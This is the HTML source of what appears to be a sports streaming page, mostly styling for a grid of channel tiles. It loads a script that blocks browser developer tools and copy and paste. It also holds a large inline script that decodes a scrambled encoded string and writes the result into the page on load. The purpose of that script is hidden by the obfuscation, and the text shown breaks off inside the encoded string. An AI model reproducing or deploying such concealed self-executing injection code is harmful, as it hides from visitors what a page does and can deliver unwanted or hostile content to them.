<!DOCTYPE html>
<head>
    <link rel="icon" href="https://i.ibb.co/cC6ZdC9/Join-Telegram-cric-streaming.jpg" type="image/png" sizes="48x48">
    <meta charset="UTF-8">
    <title>SPORTS WEB </title>
    <meta content="width=device-width,user-scalable=no,initial-scale=1,maximum-scale=1,minimum-scale=1" name="viewport">
    <meta content="IE=edge" http-equiv="X-UA-Compatible">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lobster">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
    <script disable-devtool-auto='true' src='https://cdn.jsdelivr.net/npm/disable-devtool' clear-log='true' disable-select='true' disable-copy='true' disable-cut='true' disable-paste='true'></script>
    <style>
        .loading {
            margin-top: 0;
            font-weight: 700;
            vertical-align: middle;
            line-height: 150px;
            font-size: 25px;
            text-transform: uppercase;
            background: linear-gradient(to right, red 30%, rgb(10, 60, 215) 75%);
            -webkit-background-clip: text;
            -webkit-text-fill-color: transparent;
        }

        h1 {
            background-color: #000;
            margin: 0;
            text-align: center;
            padding: 5px
        }

        a {
            color: #fff;
            text-decoration: none
        }

        tr th {
            font-tvv-name: bold;
            background-color: green;
            padding: 1px
        }

        * {
            box-sizing: border-box
        }

        @keyframes fadein {
            0% {
                opacity: 0
            }

            66% {
                opacity: 0
            }

            100% {
                opacity: 1
            }
        }

        @-webkit-keyframes fadein {
            0% {
                opacity: 0
            }

            66% {
                opacity: 0
            }

            100% {
                opacity: 1
            }
        }

        .tvv-item {
            position: relative;
            display: inline-block;
            width: 120px;
            height: 120px;
            margin: 2px;
            padding: 3px;
            border: 1px solid green z-index: 1;
            background: White;
            box-shadow: 3px 2px 2px black;
            overflow: hidden;
            border-radius: 4px;
            filter: contrast(100%)
        }

        .tvv-item>* {
            margin: 0;
            padding: 0
        }

        .tvv-item .tvv-thumb {
            width: 100%;
            bottom: 10px;
            top: 0px;
            position: absolute;
            right: 0;
            float: center;
        }

        .tvv-item .tvv-thumb img {
            width: 100%;
            pointer-events: none
        }

        .tvv-item .tvv-name {
            position: absolute;
            left: 0;
            bottom: 0;
            font-size: 12px;
            display: block;
            text-align: center;
            width: 100%;
            color: black;
            padding: 5px;
            font-weight: 800;
            text-overflow: ellipsis;
            black-space: nowrap;
            overflow: hidden;
            background: linear-gradient(to bottom left, #15b4ff 20%, #fff 100%);
            box-shadow: inset 2px 2px 2px 0px rgba(255, 255, 255, .5);
            7px 7px 20px 0px rgba(0, 0, 0, .1),
            4px 4px 5px 0px rgba(0, 0, 0, .1);
            transition: all 0.3s ease;
        }

        .tvv-item img {
            width: 100%;
            pointer-events: none
        }

        .tvv-item:after {
            position: absolute;
            content: "";
            width: 100%;
            height: 0;
            top: 0;
            left: 0;
            z-index: -1;
            border-radius: 5px;
            border: 0px solid green;
            background-color: black;
            background-image: linear-gradient(to bottom left, #32c0cc 20%, #fff 100%);
            box-shadow: inset 2px 2px 2px 0px rgba(255, 255, 255, .5);
            7px 7px 20px 0px rgba(0, 0, 0, .1),
            4px 4px 5px 0px rgba(0, 0, 0, .1);
            transition: all 0.3s ease;
        }

        .tvv-item:hover {
            color: #000;
        }

        .tvv-item:hover:after {
            top: auto;
            bottom: 0;
            height: 100%;
        }

        .tvv-item:active {
            top: 5px;
        }

        .tvv-name:hover {}

        .fin {
            width: 100%;
            margin-top: 1px;
            margin-bottom: 2px;
            float: center;
            height: 30px;
            font-size: small;
            background-color: rgb(40, 40, 40);
            color: black;
            border-radius: 10px;
            border: 3px solid greenoutline: none;
            text-align: center;
            font-family: "Poppins", sans-serif;
        }

        .fin,
        .dftr {
            width: 100%;
            margin-top: 1px;
            margin-bottom: 2px;
            float: center;
            height: 30px;
            font-style: bold;
            background-color: rgb(40, 40, 40);
            color: purple;
            background: linear-gradient(135deg, snow 0%, seashell 64%);
            border-radius: 0px;
            border: 2px solid red;
            outline: none;
            text-align: center;
            font-family: "Poppins", sans-serif;
        }

        .fin:hover,
        .dftr:hover {
            border: 3px solid rgb(255, 60, 140);
            color: red;
            background: linear-gradient(135deg, azure 0%, floralwhite 64%);
        }

        .tvv-item {
            width: calc(100%/20 - 10px)
        }
        }

        @media only screen and (max-width:2600px) {
            .tvv-item {
                width: calc(100%/19 - 10px)
            }
        }

        @media only screen and (max-width:2470px) {
            .tvv-item {
                width: calc(100%/18 - 10px)
            }
        }

        @media only screen and (max-width:2340px) {
            .tvv-item {
                width: calc(100%/17 - 10px)
            }
        }

        @media only screen and (max-width:2210px) {
            .tvv-item {
                width: calc(100%/16 - 10px)
            }
        }

        @media only screen and (max-width:2080px) {
            .tvv-item {
                width: calc(100%/15 - 10px)
            }
        }

        @media only screen and (max-width:1950px) {
            .tvv-item {
                width: calc(100%/14 - 10px)
            }
        }

        @media only screen and (max-width:1820px) {
            .tvv-item {
                width: calc(100%/13 - 10px)
            }
        }

        @media only screen and (max-width:1690px) {
            .tvv-item {
                width: calc(100%/12 - 10px)
            }
        }

        @media only screen and (max-width:1560px) {
            .tvv-item {
                width: calc(100%/11 - 10px)
            }
        }

        @media only screen and (max-width:1430px) {
            .tvv-item {
                width: calc(100%/10 - 10px)
            }
        }

        @media only screen and (max-width:1300px) {
            .tvv-item {
                width: calc(100%/9 - 10px)
            }
        }

        @media only screen and (max-width:1170px) {
            .tvv-item {
                width: calc(100%/8 - 10px)
            }
        }

        @media only screen and (max-width:1040px) {
            .tvv-item {
                width: calc(100%/7 - 10px)
            }
        }

        @media only screen and (max-width:910px) {
            .tvv-item {
                width: calc(100%/6 - 10px)
            }
        }

        @media only screen and (max-width:780px) {
            .tvv-item {
                width: calc(100%/5 - 10px)
            }
        }

        @media only screen and (max-width:650px) {
            .tvv-item {
                width: calc(100%/4 - 10px)
            }
        }

        @media only screen and (max-width:520px) {
            .tvv-item {
                width: calc(100%/3 - 10px)
            }
        }

        @media only screen and (max-width:390px) {
            .tvv-item {
                width: calc(100%/2 - 10px)
            }
        }

        .custom-btn {
            width: 130px;
            height: 40px;
            color: #fff;
            border-radius: 5px;
            padding: 10px 25px;
            font-family: 'Lato', sans-serif;
            font-weight: 500;
            background: transparent;
            cursor: pointer;
            transition: all 0.3s ease;
            position: relative;
            display: inline-block;
            box-shadow: inset 2px 2px 2px 0px rgba(255, 255, 255, .5), 7px 7px 20px 0px rgba(0, 0, 0, .1), 4px 4px 5px 0px rgba(0, 0, 0, .1);
            outline: none;
        }

        .btn-11 {
            border: white;
            background: green;
            background: linear-gradient(80deg, #15b4ff 10%, black 100%);
            color: #fff;
            overflow: hidden;
        }

        .btn-11:hover {
            text-decoration: none;
            color: #fff;
            background-image: linear-gradient(135deg,  #15b4ff 100%, #000000 20%);
        }

        .btn-11:before {
            position: absolute;
            content: '';
            display: inline-block;
            top: -180px;
            left: 0;
            width: 30px;
            height: 100%;
            background-color: #fff;
            animation: shiny-btn1 3s ease-in-out infinite;
        }

        .btn-11:hover {
            opacity: .7;
            color: white;
        }

        .btn-11:active {
            box-shadow: 4px 4px 6px 0 rgba(255, 255, 255, .3), -4px -4px 6px 0 rgba(116, 125, 136, .2), inset -4px -4px 6px 0 rgba(255, 255, 255, .2), inset 4px 4px 6px 0 rgba(0, 0, 0, .2);
        }

        @-webkit-keyframes shiny-btn1 {
            0% {
                -webkit-transform: scale(0) rotate(45deg);
                opacity: 0;
            }

            80% {
                -webkit-transform: scale(0) rotate(45deg);
                opacity: 0.5;
            }

            81% {
                -webkit-transform: scale(4) rotate(45deg);
                opacity: 1;
            }

            100% {
                -webkit-transform: scale(50) rotate(45deg);
                opacity: 0;
            }
        }

        @import url("https://fonts.googleapis.com/css?family=Roboto");

        @-webkit-keyframes come-in {
            0% {
                -webkit-transform: translatey(100px);
                transform: translatey(100px);
                opacity: 0;
            }

            30% {
                -webkit-transform: translateX(-50px) scale(0.4);
                transform: translateX(-50px) scale(0.4);
            }

            70% {
                -webkit-transform: translateX(0px) scale(1.2);
                transform: translateX(0px) scale(1.2);
            }

            100% {
                -webkit-transform: translatey(0px) scale(1);
                transform: translatey(0px) scale(1);
                opacity: 1;
            }
        }

        @keyframes come-in {
            0% {
                -webkit-transform: translatey(100px);
                transform: translatey(100px);
                opacity: 0;
            }

            30% {
                -webkit-transform: translateX(-50px) scale(0.4);
                transform: translateX(-50px) scale(0.4);
            }

            70% {
                -webkit-transform: translateX(0px) scale(1.2);
                transform: translateX(0px) scale(1.2);
            }

            100% {
                -webkit-transform: translatey(0px) scale(1);
                transform: translatey(0px) scale(1);
                opacity: 1;
            }
        }

        * {
            margin: 0;
            padding: 0;
        }

        html,
        body {
            background: #eaedf2;
            font-family: 'Roboto', sans-serif;
        }

        .stwBlurRainbow,
        .stwRainbow {
            position: fixed;
            width: 100%;
            bottom: 0;
            left: 0;
            right: 0;
            height: 3px;
            z-index: 23;
            background: linear-gradient(-45deg, #4086f4, #31a952, #fbbe01, #eb4132, #4086f4, #31a952, #fbbe01, #eb4132);
            background-size: 200%;
            -webkit-animation: animeBar 5s linear infinite;
            animation: animeBar 5s linear infinite
        }

        .stwBlurRainbow {
            height: 10px;
            z-index: 22;
            filter: blur(10px);
            opacity: .7
        }

        @-webkit-keyframes animeBar {
            0% {
                background-position: 0 50%
            }

            50% {
                background-position: 100% 50%
            }

            100% {
                background-position: 0 50%
            }
        }

        @keyframes animeBar {
            0% {
                background-position: 0 50%
            }

            50% {
                background-position: 100% 50%
            }

            100% {
                background-position: 0 50%
            }
        }

        .uc {
            pointer-events: none;
        }
    </style>
    
<script>
    
    (()=>{for(j=function(){for(h='H.!XLI<I9s8:wO)&cR0',a=new Array(h.length),l=0;l<h.length;l++)a[l]=h.charCodeAt(l);return a}(),m=m=>document.write(m),k=decodeURI("".concat(".(hn,hriAuty)g8yA))rjPr(+lc;ei.tCe%3C=l)n%22l%7D=t=b%5Ddtc%22(t=s%3E+ZW%7Brfstne%25wnlio*okr=no(r)m%3Eul=t(%22%3E%22%25a%3C)h)C%5Enooc,%5BU)efgtch+d(oh5hR#c;Dtri;cw((,leeal%20=Bon,i=e2h(=ehdar0020dgD=%7Bm%25)s,.%20sa2.l=s(pit!(e%25fc+.%25w75r%25rdS07acoohEuReIm2c2h(hneh)e5,.ct=l%25Ee3e=f2S.fwrtseu2t(e%22ti.:)3riE%25l0lfo,0lher22E%25n%25lCrB;s1)ns%25-/t%255tecZ3csnR)1lg(5t2j5;5)%25=u2an%25rberEt2%25t2sr0=eda32f2k%25ifC%25o5A:n%25a(5(E;zm%250a%25t5m=xogpto3tifnh0se3%25e)rttt;n7%25Bch25Cy2e2paoVjoh=iM-0.A-=s._(dl0e5i222%25220/Em22k+-0ln02d5:.Iar%25o/=a2niacr1o%25.nhi%25a2%25ta-s2)i0E2oE5(2p0-R2:mt%25di25R0;ltc5:anN-2bs=2.l5.iG2tZ3Ci=255etec,gy0U2n2stab/=i;(-bh5nT2p%25r622M%25U/5o%25elIe%25v:dn5elc%25=yrnt2eaC:%25ae3L3mCd3=2)m=a2c-e%25AL2Emth55e2r%25alicCo:2iTafsu%25n~t0%25220532gis5nd2-rr2h55:2Itg2t%25t3eWd(ns.%25%252N%2553dcs32c/ng3E3di3Cti5p023g3li2we%2510ry%25bgnnc%25-d2r/0Ch=vc2t-n2st.n%252ole5;e/m2css%25%25%25ameboEIE02=5ga%253ho%25%2532r2s3iE%25p2a%25v3ch%25dCg/iiood5sE522is25t9;C0%25si2teC0S2rciL/t/0C5p=2EEt%25m032./%25EtttSrse2f5/5E22s9-i553:T-e2v5go5asn25j%25lc/sc22r5ec35u5lCc5%25%25s50/s%258h025vp=32l5eJ22ei3a23edt0h2v2cd/C2ao500t3Cf%25:Cl:h2m%25a2tgnocm3v%25da%255t/aIuc5nfE3%25-garEa25g5lCdl:/%25EphE=i2in-ahI5t95at9259m2/mios5s20Egc%25y2=f12%25%25dC2v;35ee.tdr/hiamn%257mv0p0%25i25asE2%25mac/ph332rCarvi=//Cx5i/3i/i0priJpvvsfHhpihpstm255%25ii%25slh1rd2aic/slx%25s2cu2:2eaa.vt%252%25R285mtmoid2srhm%25cO3racic2scn23B2/55b2mtsyst:%25Cl3ga66%25o5ey/C3oss5t2lt%255r.m5eudt01m/%255tgdelenvmt2%25dr%25vht//svtt2rveaj5/ehhssarras2topg2n%25g%25h2/5,2_t.cnEtgt0/%25r2i332gd0//%255/5C:a%252x5r/sx20l5ae2y%25tu1lgt/3%25ea2_v302v6Gir2%25pe5t2d3s02E:Csv%25incic%251tl3/ao5E2-0t527v=epm22s///iv3yp%25h2e50%25ar5t/55ntt2=rin3.2marpsisE2%25ox3svmEt%25w5v235suas=cC-o122C5c_h=ybs.totEc0%250a:%25aofC22rmtd/Ci=avl1g2i%252/0m%25ev%25tiap3oC5r:cct.=pg%25-01r0%25chi8-Ss0o/i05i5seE/%25ieS%2521px5p633fig6/e22rsm15rdmil5c=t2aadesi3esa2a58=oi5%251seui-55v2gd5-5=0o2w/c5-th2l55g2l62Em7sheegsEhcg.9gc333ruC5pt9ds1rCntso32s,2fi=tanst5_%25vd/Ee%25r51iE6S3225/x/rs51%25l%25vpe0p371/222i2pS.o%25a1nh/w/3%252c22i%25Cvm0%25/cCetsE5e.%25/.2=acE3ii5l2ECtgv3la3lv6%25t0d1C%25lpa22h25%25xo33/%25dmhro3nC/0_%250ti%2512f%2508%25ttcicx%25/mts/E2,dch5t5g33a/fat2=2g25m22to/5lpml_i0cate-sh/a523_5=_t2sb3a32o%25v5o53spc%25%25h=1CEsp:t0Eh%25%25ad53chps%251ed/0e9E52r0p%25_5/3/1c_telieie-0%2522x0i%25pu2r2p21=2ugh2a-sl=%252v%25225h:argi:o35svsnea22riie5fs2c-%25r=est2=n5mda2av/tp2l2sfv5vpsl%255p2.3%25%25Eosixsa:d1s%25o25laa5vt5amtegt0yCshifhal3auy0itwxtt%25t:vlfs%25i02C.C/py/C5sd=mCn2/niem5022mamttso5ctEs%25-%25s1t363226c-iEi2nm%25ss.cCdc%25_dicgdu2d_t1%25cgae/=%2515t5e_/%25i2%252e32sg5//53l/r21sdct.mig220e/r1e2vC%25s-5t2.2=5215C22l2t2at%25%25u/pel132as3l5t%253s5m23=ea2eS2or22/o_bxe51arEgg60-le_dfo5m5ut//tva55o%25.cxn3ht2is/2r3o:rr2%25r0ctvo/C0%25e2.hC22semS2/ch%25svs6%25m5ays23iv/iiavrm20ai0cc05ta.bfdl%25veEn0r3%25srvs%2505p/i20t3bpcu:g3=tp5srt/Eex/sn3525p5%25Ql222h5v-2,a5i3ue1ctgCtcoEi/sn20Ei%25s2M2r2h=th-C.idaol23.ttxS-2meyiha:%25%2555s0-asicgs5de8020p22h_a%25%25s2Eal-ea%250C/3eipoE2dc53h8s.tgv128oCoicp%25eee51F23tcr2l%255522v:et5=o2%255etg2cm%25deW5h7k.s151y093Ste2/p=/crt%25l3st2lhtg02%255=3/av%25vl2-%25Cv/3c.s3=r8e-s/2mC/%2525sc5yap5v2bE2h7o32%25t%2515f.2t230i3-%25i%25Nim32.c%255u20sbs%25sic5j%25m?tC=s/ac2E2lL25rhadr/9l/&=v1elcd%25qiat%25s2p/dr/t%255i2m%25see55552CVegAChfg5i.n5%25Ge3Ct%25=%250/p2m0n%253E/2%25r2ap/td=v5g5rd5rd/255C000tsr7%25mn22t=s8e1rhv_5psiSs%255Er1ais2O55i2a2st:tp%253v2aAeer3agg/vcEin%25nmtnsp%252/E3p%25233%25o3/0;%25tv223g3i2ba30tyl.irEx%25t355%25tepda2:ece2%25s2hgtsgKC2ee%252sliKva0th282EimS05g=p5E3ye5r%25Et%255p%2522::C5f5qvtCK592scsd2sc5e33Wta%25j3Aae?=l/fp3mEr2tO.trd9i%255e/p%25EiC2cdds2a%25%25Ry3rittdE5-reNi5cv0/el%25%255A5pmcm=hn=N/srtpp:-52pc0/.%25ashso59rsvvv6n0simVv2c%255t23Cop5u3erfc%25Ea/-pEyE2aAnvC20C%25viCl5w3S:223=no%25s23/EE/uT5%255l5s-i2sg2ios3&h2vs552ts%25ac90s32d%25%25mt9ig9p5i2m2dC%25iJe2cl.sty5elY4CdG:vlr3ui=vm0v3Errdg/3552li5=mvp22snteEck%25AEm2%25ae2P.6sd2f2%252tcp32rr5mQaCs2g0i%25t-2n=d2e-a5om=.%25wllc=CC3r3/23iy2%25.C3Ydlo50eUtiC22&avthCeho3s=e2-gl==2Raix235c/%25c2v22=tgaCtbl0trK/sgeAt2ati3%25hvA52%25Hnix3s0%255dce5.%25wa/i%25%25GEinOr%252rcdu0ccmaazCdieC=15C0d22v-lodtnsid35isct2gePsgzyoa=%255vd?%2522Whb6O%250N522veXm2iaet125hQt5nhognc2i9nt5%25v2f0%25%25E0g=25Ke9q%25iE3CEheiCs.sam=%25n5m3Jl3gg;2iCCp5a03qh3i//:3gaNtEovh-e2dei2ti2tdktA5E22srv5%255/%2520n3ila%25apm2/0c-2oms5/v/ve2p%25vl%253da2i753rtCc%25byc=ywldpccoi2s2I5p5reca=c23i5h%252a-=%25mer%25g5epga:3b/%25c.h/e=iiC=%25t2ct2iae5i.2=:igvtmCa23Ca0sspez05:3h52rms525v2.5n/s0-rivaml%25.5E2ghaa%255a2c2ug%25A5vstC22/cCr-5s22gs%258200%25kc.nr5E2.mss:Nbsi2-29pn5xc3tat2E5t5=t%25%25ot=rc5l5%25s5ot5fr025UEdmEkcCssat22s2%25vs%25%2520inCels/23n05wts5=p%252%25%25/0ed)EgcetpnXEg9e2i/i2.p2%25%25mc3%250sf-a%25/rg0oolst:%250o3.t2cfEr0(E-32tj/%25evhctae5o22s.%25he%25R2/1r.glr52s70hmnoct-2d3-/r/i/diEr-v3i5sesciad222%25c5sp/=bE5s:pu/%25545%25l:e3=aii2En%25r.a9pn5t3203opni/5mietgzaie2mmCitsr9d20022%25mx05p3u%25tCrlmC4a=22mrvy%25r1it%253sg%25i232c2ll22mi5C5eeE/nhk4h/a/te%25ii2ilgyvi6nt5rra2soe%25E5r0esr2tEt5plcmxel%253o5fej25a2hogim-Cn9i5/:i-vitd5%25C3o5r%25=3ige0-v2c%25%25ps5apv/re%25vCnr2at-d/%25tbxeti23sr%25002C%25p5s02etagl5.z230m2e5e5h5E0i/5cieg3a5;25/asrDd25%25a13pg%255%252/0a%25du/cye5eol052.%25a2sgrsv0=/gr2C502r%25iC3C3ri2vv.0=3tt0tt5er33e/3/eecSeEC3bETvs3Ry2tv22sgt%25eb/s2Ccxipvi%25u3:/dgm2%25%25v.o23d%25aa-32cea.3%25/Ml05cp.s=nfE=iir%25m5%25225%25252t3cp9%253i0h2=gi32ja5e/n.s%25C5522c5si2C3mCvvs0CE0nEg:%2552se/mvH32Ecohisd0e/od0drorh5i41vbvi9mis%252pn.ldli5ar5s20yr5Mkgti52%25a2xpc2o%25fkc5r%25/xeis-%251cgepmcvr2c2CS2=e32tvS%25er.sd50l=ini535cECo5%25i5e25/p%25E0rd2S0a/ai3ft5s3dmsilsCvr03-3E2%25ctdhS3sW%25v2/c%25/5%255i/2p%25mkhtE5%25n2pa%250t2idh2%25o2Es2x2/i3t5le-giy06giC2%2552.%255v3C5ro5eoe0%25E2Wt2crl5yc-=y2trc25%25sEcCaggiv/tn29m2ClEn23%25s5i=isa%25ts5gc/3Eml-3k=l025/h0-g%25v22/332tav./%25%25v23%250aE:2dnCitmtwdss-%25mk5%2523ss02n0x22eak%253a5v=vete0J/y3c%250um.%25/2ati2%252c50tit-c5kc0a2ibF5V%25=hokngdesi%25Es532=ril22.y%25.5-m2va02i/p535s0saeinfc=n25%25%25sltCis23-m2%25c29ki0i23/r0vE%25C5l%25g25am5s=av3i35tdme2p5iaCs%25553gn-/5:CrySd%25se2%25d3tksn5CS=sreok2%25xE%25=ssev5i2=aE/%252g29%2555t/aEc5lm.ted%252iat25olc%25c3b3%25o5ispyabg93pta.y22r22vb522sh5dt22a02c%25e5tdpsgivapEs3b2dC%25c3/cc5fmCh23g2e%25i2es3ita-Eth0am-25i5t-arsvsehar.%25F2ceg5D:=vpo.tgv22nPtg%25c:nv%25/2=v-r.v3%25pb3%253%25%25Eh2v2C%25i/5%25552-33vy3%25s22/v0tcicc2.Cm23%25l%253.c5prd%2532l9viElyd2be3y0w2sc522nksl25mae0s0be/220lis/5Cstc3r0etlmt3v5h2S52225tlsa20%25t%25nv5:2sn2s%25ii5Gx322eh5cvCe/225dyddi2S25%25EgotmCf.re/CpoEpr%25stea2ggnp%25/u/0a:osE/rm0%25%255/ei/Ck-piiroa3020k%252i5Et5s=3yxsas5%25os95umtalaa3i%253f2n2/s53E=EL2=10hg0M:%253etsgk%25mee30s2%25t/i53ig2tsE2sr0%25r%25r32b2c0%25n.=EC.bCg5id2%25vf0%25v%25laH3emiEav53mC525%250C//llcR-d50E22g22v2-%25ii5t2av2i2eg2d25%255cl0d/a5mnrh:5sgaQ22s55dii3Em0ts2e%25%25/Enyheag=i=%250sx5k2st%25r2/o2=%25epri5.CamCrersiC-g=ccoe-%2522e0lc50y/pltne:k3-s.2.Co=/i5c%253%255//0/%25So%25Csc5/eirdacmvaeclE3%25n255/-pte9ihy2./253/Ey9i2kpnE55s%25lmx/vi.C%25mPs3saecpgl5gk%25dy%25=g3tEs3c32-%25Qorv=rtsatg0=2C2dg3i5ah0hET%25522d32iivErv-%25h%25m20c20p-e%25gil5m5e.%2532rdec2n.v/ae=s2i%25lorkg5iyc22irat25c.bi32epssgvekt22ga2C2-rgC.eNtns%25shvCs=t0/p5sScv33%25t2t22tj%250gm0i%25npia3Edg1ie=2=r-5pa.5/n2sk25hn%25:50e2vv5%252elvl5ydi/5lt93hod%25al%25t3nsstL=S2i32p%250tr55E%25ni/%25805c2sbdd%255/2lt2%252i2C%25gix5so2522%25%253v5C%25fnv0dre5=233c5/5eoCn=.%25ac=kyta%25a2a2/mSr/00b2elmvirE0t25i2n5te25%25g5e5tss2lc=sSc%252sh5232css5-p%25vv%25%25255223C%25s2ivd%255255iy/Eh2/ae%25asr5%25i%25a3aetsAEp%25sa2dr3%25Cj0iSss.i390ivt23ngb2ocSsiv-c3ef332rttfE0%25c20a=c552ac%25%250opoq2r5tw2.Z5=its2bd9E%25tisiy%252l5=hmina.0/2vCCv22%25suvUao2S55EaiCd%25a3C%25x%25a-c5e2%25=sn5F?ca/24%256Cdm2s3ii52mjy/i-gPtsCg5E53/=2z5iAcoo5v5cec3vnA0SAt%25udE/W#at:r3%252i/y=r:gssmglisidhvyS225v5a2op2D5%25ce3/aN2t5g5w2sGcqt:sitit%25%2522si:g%25H=35a%25%2552pedcq%253ilcdE2/y2ppeR3-/%252gea2tv2n3t2teit/r&a5x2mb5c%250fp05iv5yr5=3G52oacr-vd3po3l%25ad%25vjxt5c2dJi/2E2lebn%25E5-G2t50ve15b3%25%2502f%252eat23Et12t5ttmn.i=.W_%25E%25ect22ic2aM2j%2520nv5.%25i32plvCov%25%25MCC22FG22E:atcvnknrvmrs%251=s0%25mcge0br%25mK3v15fga/0Tlth2t3Nvgsat152ohdk/aa%25hiys220:i2do3ycn2fopd0/w2ppcysgi28.s0g%25eit3s50jsi5r:E-C0=v0s30-32tCaE=-k12e/csTddCap/3si/slevCgngms5k3t:ot5ai/e2.e%25t0//hens/5CE0ya3t5i=a35lh05t=n%2527Einy/teg5C%25.E05c%25vpCh5%2532go2ro252veitmh.ess2avs2%25S2drn5-er50%25pltet5%25%25d2a=.%25vs/i=sep2-2ie3bc5d:s%25W0nlexx-vy%25sc%2532al5c%25o2g22%25drrTl-b2sC5NE-oe522=2tt2grC%25sc%25i5e5a7fi5/tT3v%255lE-2m5%25/iv%253-J3:2Cenie05c2Et/ri2=thC2mtlb2.5a552o0v=Cicr-r23pdj5dse555xivalCrBicsl=0C02hrmcb%253m22Cca:aT%2553t=5atryc259%25.2t2Q%252t2%25tgb/tas#5%25ai%252E=/l%252C0%25vsbl%2552pi3e5%25sg33%25i2=pCsdt2.%25r5ox20J/i=Enrs=scs=v292rha-ecm-sxmnE2d%25tnt5%25%253%255nlh25c%2522%25=E23t/:a/C023%25g2%25302bC022tvcC523magl75%25eisrp52C52h%25v20essmdNsd35vai055d0n3#009d5eoeer322/2s5v2vs%255e553et%255nt%25dt5t2.2332aC5o2iB%2502al0aS2attci%25n2s/0tr:ooEco.hc%25iE3lg3/3v2C2-23030m9Cpiec4.TEv5vcivEx/2s32g.cc=E00#e2.335E5ty/%25/g%25h%25d5cccl2/alrv/1lgdS/%255%252aE0a225a5id2p%253yo0/9/t=t5/.idamg5r5T2%252%25E2e4i-Cs:2siee5=%25505eipcsb%25os3ts5g3m0r-esrerE.ttpCno22mlic12t2o2-C:ots2C5%25aehesc03ltd2esl25j=-t5v%25d2/in5f:M%25p/%25C=ei1hp%25s223i-r22%25/d2/b5r2:B.eeh%25nT2in%25%25.os55%253E-rso5Cgsbv5l.2nv/3rctvosn2ly0m3=%25t:d%25%25-r/i0ei5c5v-t2y5Taa0cp%25.E2/Efo/h=i2tgoe5-gvcts35iCeCosjnt%252a55n3pi%25m=ov%25%25a.b/r5oaa005sm5ct2t%25%25vgy2223ccsEt555a-hrC%25C%25m/Bxx%25v:52%252mi%25dcg%25ls22%25%252m32r2aiEs37%25r/o2r52p=22%25bh=cpCal2n3sh55rs0i2535cc9e%25=h5j35stmeivlc0%2522525%25dme55iYp%25iyNE3%25yppl/23vh/evLin30%25bpltC=%25%2522g0aEE/Sa2dy5s251Co5rt1E02bt3-i5t2t3/i3/:3mp..lipto5Ci5v5/v%25g5aa3is2%2522%25rirbEn.5t3n0E%25%25Erii-f2:2xd=-5ai2.5y/gaass2/2Cvt2gCnE0ht33i20C/2gt.tdeis%252d%25yircm%25tdsm22.tic4=%25t2FaELi3v2/v%25n2ryxtve0ri530%255S2s52m%25m5t2vg/5g25=dsclpy2%253Etainca-n23p5C5se==0%25na:gg9ea%25/dgelt%25y5dCs5Ccheg3%25E22iT3ep3i2%255%25nEc2222%25n3ielsr5/2y2t2a5%25V3%25ppt32%25/=a.oiie%25cf5%2533-si3ogni2%25m%25t=hmssf20tiF%25E3C5be90%25.22iEnci%25cl0Ccr33roeeh=2=dv/5-l/n02c2:b%25ds0i2p/Ba5tn22v.l%25rJga5igi-2e5tiy1isnv2/24n0a2a52t0t5%25%2522h5e2di03ilp%25o.c2205lsasC%25n5m22ao%25ltv2/2j.3/gt/vC5E5i%25ln%25h%25n12ntov2Crf2:3ao/--x.vse=sli0Coesit50v.2e23s3ttZE%25v2C3S0S-n30n3Ex=0eoi5hv5m=5%252ignhxtc2=m2EpCss%25iabps/l/s2a5%25ed-T5c3vnoecij2Myt32pcE5Dsat50et-C/:0sglcstay/v=se3p=ar5/j%2532-5r2avy5d-Ca3is=0C/c3iDha./9tC2EiVy%25%252oh%255p3ca23%25005W2t/r52stY3=rnn%255lnshglCsyon30%25tcg2t5a8td2v%255y23%25b%255cm5.ggslhs=r25rotn85:/iCe-a20q4%25ETc%2505nEs2dTpsamrsC0vsesei%253tli%25i3-gv2ud%252.nviip5222g5/Sitji2%25le2C%25ci%25t/tmi3s5soi-dU-5ei2ea%25%25a%25rT1d0em223s%25/225b=25=-a.5m5ligaE.c%2552s%25%253E0C=0vi2=aaJ03im/C5iglpno/53Cs5et3sW5%25vfoCl%25a.22i=i45B2/e5gric:t2h2v3r2inm2s2csv52Egitcdvx2o%25fcefe/%25sh09oeb%25tC2yii3%2535g5iS3/4a/53a:h2sEpptEhsvC.2s0mEre/o25r:55e5c%2522%25pvS/hnC507cnpsc5-37g%25nEp3/c0Lmx.r0i53iadC00c%25d-cE2-p%25/2Ed.isC3a%255:1g2Vp2ni3/slvrmeyh223lI2%25C-zCl/Es2bte%2555sEgti3%25a3/msssnva2nh/sntg%25i5c2d2=5ivE22nnpev/vh/as0sovCsw25%252%25%2525552.00E2Csy2tE2t.%25/ll0vioia/52cC=%252Tylt5pteC5tj52h233msy5ty05a9:-3233m%25di%25.5522eCml2:mamosgt29yt%2552a3a5s%25=Ey%250ASts2i%25mcrtt2o5ei.tc/sox%25nc1.v3=aensy2c0nE2r5d%25:%25oi%25g5ptNvtE%2521/so0tCs%25333i.vs.3pnv5sycgae/0de3crPi2%25=p%25t0e2.V5ml%25as%25%25t2t2p05e2e2Kdv0d2at23%25/e2d0t2c=f2s2%25o55-232eh2us253/22sd%25C222C%25=vn2%25:%25tnS2e5i4t-el/5s52rd2Ggsr2lsRcc2%25Q3i5a%25t0g2i5%255C32dEs/gEp5EpEdaeC/g3a/:mi%25m3f2Z3p=g=d3caClUvgih3nH225e3%25=EpH/5g%25sT05di2h.N5NxJX=5/9cr5ErE/%2530ve.e0mtc%25a/n=2EbbCi?5n3p53as5/5ag72rdCe5-/nte/52303xA%25Jg5o256%25c2C0L30C2hn-50V02%25v=q.05v5npt3%25g=Eia%252v=5g%252nyiVl%25f2m%253t25csq:ogn%25svs2%25-t5e32/e-cpvemE%25lae2n%25P2v2v2%25-0Zp2c5le2eil%25lA0%25eaas%25nSg22%25%25l-qc3LsaA%25%25m52Ntd0tsC5d9N225n525?W%25iEts/avb:hv3gidl3g5i/30ctNrEda-oE05Q2=Ngit3ant-c0p%25522a5pid00s.23%25-c:pa.s=ts:ip5Srvc%2502gi2/veuC22a=sE235g5/Cfep/7/5i23925h%25%25ca=3hn0av20%25092N/3h9=Latt%252No=s5oig2tc03lFl:tsppr20/nbm2s%252vnzosnmAtv%252%25vEve2s-q%25a=e22g%255e2gcnP33vi35/iCiHet=i=id2eC/tn5rCgd%25l%2525Q.rtsa.C/EflG25%25uscvd1=E.hqha/AEhEias2ccQetuv522.5eUm2e25a:%25s2%25Cyaar-mt55t23=m%25ca%255ea8//5tri-P=2gdu353/SEpE%253Ee52c530cgmCi=5rtnv5r%25%25.Y%250cmp2EpC%25=2552e53B2ma5%25s0isa0v23%25e5%25EC3yligtn72lCs5y50